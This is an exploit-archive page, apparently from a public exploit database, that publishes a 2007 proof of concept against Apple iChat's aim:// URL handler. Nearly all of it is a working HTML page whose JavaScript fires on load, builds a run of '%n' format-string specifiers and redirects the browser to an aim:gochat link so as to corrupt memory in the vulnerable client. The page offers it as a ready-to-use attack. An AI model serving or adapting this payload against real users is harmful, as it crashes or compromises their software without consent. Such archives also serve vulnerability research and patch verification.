[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Apple iChat 3.1.6 v441 aim:// URL Handler Format String Exploit PoC
# Published : 2007-01-21
# Author : MoAB
# Previous Title : Sami HTTP Server 2.0.1 (HTTP 404 - Object not found) DoS Exploit
# Next Title : Mercur IMAPD 5.00.14 Remote Denial of Service Exploit (win32)


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
	"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
	<head>
		<title>MOAB-20-01-2007</title>
		<script>
			function boom() {
				var str = '';
				for (var i = 0; i < 20; i++) {
				    str = str + escape('A%n');
				}
				str = 'aim:gochat?roomname=' + str;
				window.location = str;
			}
		</script>
	</head>
	<body onload="boom()">
	</body>
</html>

# www.Syue.com [2007-01-21]